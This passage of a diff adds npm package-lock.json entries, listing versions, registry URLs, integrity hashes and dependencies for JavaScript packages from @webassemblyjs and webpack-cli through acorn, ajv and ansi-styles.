"sha512-JLBl+KZ0R5qB7mCnud/yyX08jWFw5MsoalJ1pQ4EdFlgj9VdXKGuENGsiCIjegI1W7p91rUlcB/LB5yRJKNTcQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@webassemblyjs/helper-api-error": "1.13.2", + "@webassemblyjs/helper-wasm-bytecode": "1.13.2", + "@webassemblyjs/ieee754": "1.13.2", + "@webassemblyjs/leb128": "1.13.2", + "@webassemblyjs/utf8": "1.13.2" + } + }, + "node_modules/@webassemblyjs/wast-printer": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@webassemblyjs/wast-printer/-/wast-printer-1.14.1.tgz", + "integrity": "sha512-kPSSXE6De1XOR820C90RIo2ogvZG+c3KiHzqUoO/F34Y2shGzesfqv7o57xrxovZJH/MetF5UjroJ/R/3isoiw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@webassemblyjs/ast": "1.14.1", + "@xtuc/long": "4.2.2" + } + }, + "node_modules/@webpack-cli/configtest": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@webpack-cli/configtest/-/configtest-2.1.1.tgz", + "integrity": "sha512-wy0mglZpDSiSS0XHrVR+BAdId2+yxPSoJW8fsna3ZpYSlufjvxnP4YbKTCBZnNIcGN4r6ZPXV55X4mYExOfLmw==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + } + }, + "node_modules/@webpack-cli/info": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/@webpack-cli/info/-/info-2.0.2.tgz", + "integrity": "sha512-zLHQdI/Qs1UyT5UBdWNqsARasIA+AaF8t+4u2aS2nEpBQh2mWIVb8qAklq0eUENnC5mOItrIB4LiS9xMtph18A==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + } + }, + "node_modules/@webpack-cli/serve": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@webpack-cli/serve/-/serve-2.0.5.tgz", + "integrity": "sha512-lqaoKnRYBdo1UgDX8uF24AfGMifWK19TxPmM5FHc2vAGxrJ/qtyUyFBWoY1tISZdelsQ5fBcOusifo5o5wSJxQ==", + "dev": true, + "engines": { + "node": ">=14.15.0" + }, + "peerDependencies": { + "webpack": "5.x.x", + "webpack-cli": "5.x.x" + }, + "peerDependenciesMeta": { + "webpack-dev-server": { + "optional": true + } + } + }, + "node_modules/@xmldom/xmldom": { + "version": "0.7.13", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.7.13.tgz", + "integrity": "sha512-lm2GW5PkosIzccsaZIz7tp8cPADSIlIHWDFTR1N0SzfinhhYgeIQjFMz4rYzanCScr3DqQLeomUDArp6MWKm+g==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@xtuc/ieee754": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@xtuc/ieee754/-/ieee754-1.2.0.tgz", + "integrity": "sha512-DX8nKgqcGwsc0eJSqYt5lwP4DH5FlHnmuWWBRy7X0NcaGR0ZtuyeESgMwTYVEtxmsNGY+qit4QYT/MIYTOTPeA==", + "dev": true, + "license": "BSD-3-Clause" + }, + "node_modules/@xtuc/long": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/@xtuc/long/-/long-4.2.2.tgz", + "integrity": "sha512-NuHqBY1PB/D8xU6s/thBgOAiAP7HOYDQ32+BFZILJ8ivkUkAHQnWfn6WhL79Owj1qmUnoN/YPhktdIoucipkAQ==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/@yarnpkg/lockfile": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@yarnpkg/lockfile/-/lockfile-1.1.0.tgz", + "integrity": "sha512-GpSwvyXOcOOlV70vbnzjj4fW5xW/FdUF6nQEt1ENy7m4ZCczi1+/buVUPAqmGfqznsORNFzUMjctTIp8a9tuCQ==" + }, + "node_modules/5to6-codemod": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/5to6-codemod/-/5to6-codemod-1.8.0.tgz", + "integrity": "sha512-RUHjjwl9+p1d46USvmoKsmMaHODFUAESE1de/q0qQM+hwzgk/HssTwb1Nc5dbUpKEkJ7duLg6ggMIwScd+TRig==", + "dev": true, + "dependencies": { + "jscodeshift": "^0.6.3", + "lodash": "^4.17.4", + "recast": "^0.12.1" + } + }, + "node_modules/5to6-codemod/node_modules/ast-types": { + "version": "0.10.1", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.10.1.tgz", + "integrity": "sha512-UY7+9DPzlJ9VM8eY0b2TUZcZvF+1pO0hzMtAyjBYKhOmnvRlqYNYnWdtsMj0V16CGaMlpL0G1jnLbLo4AyotuQ==", + "dev": true, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/5to6-codemod/node_modules/braces": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/braces/-/braces-2.3.2.tgz", + "integrity": "sha512-aNdbnj9P8PjdXU4ybaWLK2IF3jc/EoDYbC7AazW6to3TRsfXxscC9UXOB5iDiEQrkyIbWp2SLQda4+QAa7nc3w==", + "dev": true, + "dependencies": { + "arr-flatten": "^1.1.0", + "array-unique": "^0.3.2", + "extend-shallow": "^2.0.1", + "fill-range": "^4.0.0", + "isobject": "^3.0.1", + "repeat-element": "^1.1.2", + "snapdragon": "^0.8.1", + "snapdragon-node": "^2.0.1", + "split-string": "^3.0.2", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/braces/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.23.3 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. Some versions have web compatibility issues. Please, upgrade your dependencies to the actual version of core-js.", + "dev": true, + "hasInstallScript": true + }, + "node_modules/5to6-codemod/node_modules/fill-range": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-4.0.0.tgz", + "integrity": "sha512-VcpLTWqWDiTerugjj8e3+esbg+skS3M9e54UuR3iCeIDMXCLTsAH8hTSzDQU/X6/6t3eYkOKoZSef2PlU6U1XQ==", + "dev": true, + "dependencies": { + "extend-shallow": "^2.0.1", + "is-number": "^3.0.0", + "repeat-string": "^1.6.1", + "to-regex-range": "^2.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/fill-range/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-number": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-3.0.0.tgz", + "integrity": "sha512-4cboCqIpliH+mAvFNegjZQ4kgKc3ZUhQVr3HvWbSh5q3WH2v82ct+T2Y1hdU5Gdtorx/cLifQjqCbL7bpznLTg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/is-number/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift": { + "version": "0.6.4", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-0.6.4.tgz", + "integrity": "sha512-+NF/tlNbc2WEhXUuc4WEJLsJumF84tnaMUZW2hyJw3jThKKRvsPX4sPJVgO1lPE28z0gNL+gwniLG9d8mYvQCQ==", + "dev": true, + "dependencies": { + "@babel/core": "^7.1.6", + "@babel/parser": "^7.1.6", + "@babel/plugin-proposal-class-properties": "^7.1.0", + "@babel/plugin-proposal-object-rest-spread": "^7.0.0", + "@babel/preset-env": "^7.1.6", + "@babel/preset-flow": "^7.0.0", + "@babel/preset-typescript": "^7.1.0", + "@babel/register": "^7.0.0", + "babel-core": "^7.0.0-bridge.0", + "colors": "^1.1.2", + "flow-parser": "0.*", + "graceful-fs": "^4.1.11", + "micromatch": "^3.1.10", + "neo-async": "^2.5.0", + "node-dir": "^0.1.17", + "recast": "^0.16.1", + "temp": "^0.8.1", + "write-file-atomic": "^2.3.0" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift/node_modules/ast-types": { + "version": "0.11.7", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.11.7.tgz", + "integrity": "sha512-2mP3TwtkY/aTv5X3ZsMpNAbOnyoC/aMJwJSoaELPkHId0nSQgFcnU4dRW3isxiz7+zBexk0ym3WNVjMiQBnJSw==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/5to6-codemod/node_modules/jscodeshift/node_modules/recast": { + "version": "0.16.2", + "resolved": "https://registry.npmjs.org/recast/-/recast-0.16.2.tgz", + "integrity": "sha512-O/7qXi51DPjRVdbrpNzoBQH5dnAPQNbfoOFyRiUwreTMJfIHYOEBzwuH+c0+/BTSJ3CQyKs6ILSWXhESH6Op3A==", + "dev": true, + "dependencies": { + "ast-types": "0.11.7", + "esprima": "~4.0.0", + "private": "~0.1.5", + "source-map": "~0.6.1" + }, + "engines": { + "node": ">= 4" + } + }, + "node_modules/5to6-codemod/node_modules/micromatch": { + "version": "3.1.10", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-3.1.10.tgz", + "integrity": "sha512-MWikgl9n9M3w+bpsY3He8L+w9eF9338xRl8IAO5viDizwSzziFEyUzo2xrrloB64ADbTf8uA8vRqqttDTOmccg==", + "dev": true, + "dependencies": { + "arr-diff": "^4.0.0", + "array-unique": "^0.3.2", + "braces": "^2.3.1", + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "extglob": "^2.0.4", + "fragment-cache": "^0.2.1", + "kind-of": "^6.0.2", + "nanomatch": "^1.2.9", + "object.pick": "^1.3.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/recast": { + "version": "0.12.9", + "resolved": "https://registry.npmjs.org/recast/-/recast-0.12.9.tgz", + "integrity": "sha512-y7ANxCWmMW8xLOaiopiRDlyjQ9ajKRENBH+2wjntIbk3A6ZR1+BLQttkmSHMY7Arl+AAZFwJ10grg2T6f1WI8A==", + "dev": true, + "dependencies": { + "ast-types": "0.10.1", + "core-js": "^2.4.1", + "esprima": "~4.0.0", + "private": "~0.1.5", + "source-map": "~0.6.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/5to6-codemod/node_modules/to-regex-range": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-2.1.1.tgz", + "integrity": "sha512-ZZWNfCjUokXXDGXFpZehJIkZqq91BcULFq/Pi7M5i4JnxXdhMKAK682z8bCW3o8Hj1wuuzoKcW3DfVzaP6VuNg==", + "dev": true, + "dependencies": { + "is-number": "^3.0.0", + "repeat-string": "^1.6.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/5to6-codemod/node_modules/write-file-atomic": { + "version": "2.4.3", + "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-2.4.3.tgz", + "integrity": "sha512-GaETH5wwsX+GcnzhPgKcKjJ6M2Cq3/iZp1WyY/X1CSqrW+jVNM9Y7D8EC2sM4ZG/V8wZlSniJnCKWPmBYAucRQ==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.1.11", + "imurmurhash": "^0.1.4", + "signal-exit": "^3.0.2" + } + }, + "node_modules/abab": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/abab/-/abab-2.0.6.tgz", + "integrity": "sha512-j2afSsaIENvHZN2B8GOpF566vZ5WVk5opAiMTvWgaQT8DkbOqsTfvNAvHoRGU2zzP8cPoqys+xHTRDWW8L+/BA==", + "dev": true + }, + "node_modules/abbrev": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-1.1.1.tgz", + "integrity": "sha512-nne9/IiQ/hzIhY6pdDnbBtz7DjPTKrY00P/zvPSm5pOFkl6xuGrGnXn/VtTNNfNtAfZ9/1RtehkszU9qcTii0Q==" + }, + "node_modules/abort-controller": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz", + "integrity": "sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==", + "dependencies": { + "event-target-shim": "^5.0.0" + }, + "engines": { + "node": ">=6.5" + } + }, + "node_modules/accepts": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", + "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", + "dependencies": { + "mime-types": "~2.1.34", + "negotiator": "0.6.3" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/acorn": { + "version": "7.4.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", + "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/acorn-class-fields": { + "version": "0.3.7", + "resolved": "https://registry.npmjs.org/acorn-class-fields/-/acorn-class-fields-0.3.7.tgz", + "integrity": "sha512-jdUWSFce0fuADUljmExz4TWpPkxmRW/ZCPRqeeUzbGf0vFUcpQYbyq52l75qGd0oSwwtAepeL6hgb/naRgvcKQ==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6 || ^7 || ^8" + } + }, + "node_modules/acorn-globals": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/acorn-globals/-/acorn-globals-6.0.0.tgz", + "integrity": "sha512-ZQl7LOWaF5ePqqcX4hLuv/bLXYQNfNWw2c0/yX/TsPRKamzHcTGQnlCjHT3TsmkOUVEPS3crCxiPfdzE/Trlhg==", + "dev": true, + "dependencies": { + "acorn": "^7.1.1", + "acorn-walk": "^7.1.1" + } + }, + "node_modules/acorn-jsx": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", + "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", + "peerDependencies": { + "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/acorn-private-class-elements": { + "version": "0.2.7", + "resolved": "https://registry.npmjs.org/acorn-private-class-elements/-/acorn-private-class-elements-0.2.7.tgz", + "integrity": "sha512-+GZH2wOKNZOBI4OOPmzpo4cs6mW297sn6fgIk1dUI08jGjhAaEwvC39mN2gJAg2lmAQJ1rBkFqKWonL3Zz6PVA==", + "dev": true, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6.1.0 || ^7 || ^8" + } + }, + "node_modules/acorn-private-methods": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/acorn-private-methods/-/acorn-private-methods-0.3.3.tgz", + "integrity": "sha512-46oeEol3YFvLSah5m9hGMlNpxDBCEkdceJgf01AjqKYTK9r6HexKs2rgSbLK81pYjZZMonhftuUReGMlbbv05w==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6 || ^7 || ^8" + } + }, + "node_modules/acorn-stage3": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/acorn-stage3/-/acorn-stage3-4.0.0.tgz", + "integrity": "sha512-BR+LaADtA6GTB5prkNqWmlmCLYmkyW0whvSxdHhbupTaro2qBJ95fJDEiRLPUmiACGHPaYyeH9xmNJWdGfXRQw==", + "dev": true, + "dependencies": { + "acorn-class-fields": "^0.3.7", + "acorn-private-methods": "^0.3.3", + "acorn-static-class-features": "^0.2.4" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^7.4 || ^8" + } + }, + "node_modules/acorn-static-class-features": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/acorn-static-class-features/-/acorn-static-class-features-0.2.4.tgz", + "integrity": "sha512-5X4mpYq5J3pdndLmIB0+WtFd/mKWnNYpuTlTzj32wUu/PMmEGOiayQ5UrqgwdBNiaZBtDDh5kddpP7Yg2QaQYA==", + "dev": true, + "dependencies": { + "acorn-private-class-elements": "^0.2.7" + }, + "engines": { + "node": ">=4.8.2" + }, + "peerDependencies": { + "acorn": "^6.1.0 || ^7 || ^8" + } + }, + "node_modules/acorn-walk": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-7.2.0.tgz", + "integrity": "sha512-OPdCF6GsMIP+Az+aWfAAOEt2/+iVDKE7oy6lJ098aoe59oAmK76qV6Gw60SbZ8jHuG2wH058GF4pLFbYamYrVA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/adjust-sourcemap-loader": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/adjust-sourcemap-loader/-/adjust-sourcemap-loader-4.0.0.tgz", + "integrity": "sha512-OXwN5b9pCUXNQHJpwwD2qP40byEmSgzj8B4ydSN0uMNYWiFmJ6x6KwUllMmfk8Rwu/HJDFR7U8ubsWBoN0Xp0A==", + "dev": true, + "dependencies": { + "loader-utils": "^2.0.0", + "regex-parser": "^2.2.11" + }, + "engines": { + "node": ">=8.9" + } + }, + "node_modules/adm-zip": { + "version": "0.5.16", + "resolved": "https://registry.npmjs.org/adm-zip/-/adm-zip-0.5.16.tgz", + "integrity": "sha512-TGw5yVi4saajsSEgz25grObGHEUaDrniwvA2qwSC060KfqGPdglhvPMA2lPIoxs3PQIItj2iag35fONcQqgUaQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.0" + } + }, + "node_modules/agent-base": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-6.0.2.tgz", + "integrity": "sha512-RZNwNclF7+MS/8bDg70amg32dyeZGZxiDuQmZxKLAlQjr3jGyLx+4Kkk58UO7D2QdgFIQCovuSuZESne6RG6XQ==", + "dependencies": { + "debug": "4" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/aggregate-error": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/aggregate-error/-/aggregate-error-3.1.0.tgz", + "integrity": "sha512-4I7Td01quW/RpocfNayFdFVk1qSuoh0E7JrbRJ16nH01HhKFQ88INq9Sd+nd72zqRySlr9BmDA8xlEJ6vJMrYA==", + "dependencies": { + "clean-stack": "^2.0.0", + "indent-string": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ajv-formats": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/ajv-formats/-/ajv-formats-2.1.1.tgz", + "integrity": "sha512-Wx0Kx52hxE7C18hkMEggYlEifqWZtYaRgouJor+WMdPnQyEK13vgEWyVNup7SoeeoLMsr4kf5h6dOW11I15MUA==", + "dependencies": { + "ajv": "^8.0.0" + }, + "peerDependencies": { + "ajv": "^8.0.0" + }, + "peerDependenciesMeta": { + "ajv": { + "optional": true + } + } + }, + "node_modules/ajv-formats/node_modules/ajv": { + "version": "8.11.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.11.0.tgz", + "integrity": "sha512-wGgprdCvMalC0BztXvitD2hC04YffAvtsUn93JbGXYLAtCUO4xd17mCCZQxUOItiBwZvJScWo8NIvQMQ71rdpg==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ajv-formats/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "node_modules/ajv-keywords": { + "version": "3.5.2", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-3.5.2.tgz", + "integrity": "sha512-5p6WTN0DdTGVQk6VjcEju19IgaHudalcfabD7yhDGeA6bcQnmL+CpveLJq/3hvfwd1aof6L386Ougkx6RfyMIQ==", + "dev": true, + "peerDependencies": { + "ajv": "^6.9.1" + } + }, + "node_modules/algoliasearch": { + "version": "3.35.1", + "resolved": "https://registry.npmjs.org/algoliasearch/-/algoliasearch-3.35.1.tgz", + "integrity": "sha512-K4yKVhaHkXfJ/xcUnil04xiSrB8B8yHZoFEhWNpXg23eiCnqvTZw1tn/SqvdsANlYHLJlKl0qi3I/Q2Sqo7LwQ==", + "dev": true, + "dependencies": { + "agentkeepalive": "^2.2.0", + "debug": "^2.6.9", + "envify": "^4.0.0", + "es6-promise": "^4.1.0", + "events": "^1.1.0", + "foreach": "^2.0.5", + "global": "^4.3.2", + "inherits": "^2.0.1", + "isarray": "^2.0.1", + "load-script": "^1.0.0", + "object-keys": "^1.0.11", + "querystring-es3": "^0.2.1", + "reduce": "^1.0.1", + "semver": "^5.1.0", + "tunnel-agent": "^0.6.0" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/algoliasearch/node_modules/agentkeepalive": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/agentkeepalive/-/agentkeepalive-2.2.0.tgz", + "integrity": "sha1-xdG9SxKQCPEWPyNvhuX66iAm4u8=", + "dev": true, + "engines": { + "node": ">= 0.10.0" + } + }, + "node_modules/algoliasearch/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/algoliasearch/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=", + "dev": true + }, + "node_modules/algoliasearch/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/ally.js": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/ally.js/-/ally.js-1.4.1.tgz", + "integrity": "sha512-ZewdfuwP6VewtMN36QY0gmiyvBfMnmEaNwbVu2nTS6zRt069viTgkYgaDiqu6vRJ1VJCriNqV0jGMu44R8zNbA==", + "dev": true, + "dependencies": { + "css.escape": "^1.5.0", + "platform": "1.3.3" + } + }, + "node_modules/ally.js/node_modules/platform": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/platform/-/platform-1.3.3.tgz", + "integrity": "sha512-VJK1SRmXBpjwsB4YOHYSturx48rLKMzHgCqDH2ZDa6ZbMS/N5huoNqyQdK5Fj/xayu3fqbXckn5SeCS1EbMDZg==", + "dev": true + }, + "node_modules/ansi-color": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/ansi-color/-/ansi-color-0.2.1.tgz", + "integrity": "sha512-bF6xLaZBLpOQzgYUtYEhJx090nPSZk1BQ/q2oyBK9aMMcJHzx9uXGCjI2Y+LebsN4Jwoykr0V9whbPiogdyHoQ==", + "engines": { + "node": "*" + } + }, + "node_modules/ansi-colors": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.3.tgz", + "integrity": "sha512-/6w/C21Pm1A7aZitlI5Ni/2J6FFQN8i1Cvz3kHABAAbw93v/NlvKdVOqz7CCWz/3iv/JplRSEEZ83XION15ovw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/ansi-escapes": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", + "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", + "dev": true, + "dependencies": { + "type-fest": "^0.21.3" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-escapes/node_modules/type-fest": { + "version": "0.21.3", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ansi-html": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/ansi-html/-/ansi-html-0.0.9.tgz", + "integrity": "sha512-ozbS3LuenHVxNRh/wdnN16QapUHzauqSomAl1jwwJRRsGwFwtj644lIhxfWu0Fy0acCij2+AEgHvjscq3dlVXg==", + "dev": true, + "engines": [ + "node >= 0.8.0" + ], + "license": "Apache-2.0", + "bin": { + "ansi-html": "bin/ansi-html" + } + }, + "node_modules/ansi-html-community": { + "version": "0.0.8", + "resolved": "https://registry.npmjs.org/ansi-html-community/-/ansi-html-community-0.0.8.tgz", + "integrity": "sha512-1APHAyr3+PCamwNw3bXCPp4HFLONZt/yIH0sZp0/469KWNTEy+qN5jQ3GVX6DMZ1UXAi34yVwtTeaG/HpBuuzw==", + "dev": true, + "engines": [ + "node >= 0.8.0" + ], + "bin": { + "ansi-html": "bin/ansi-html" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-styles": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", + "integrity": 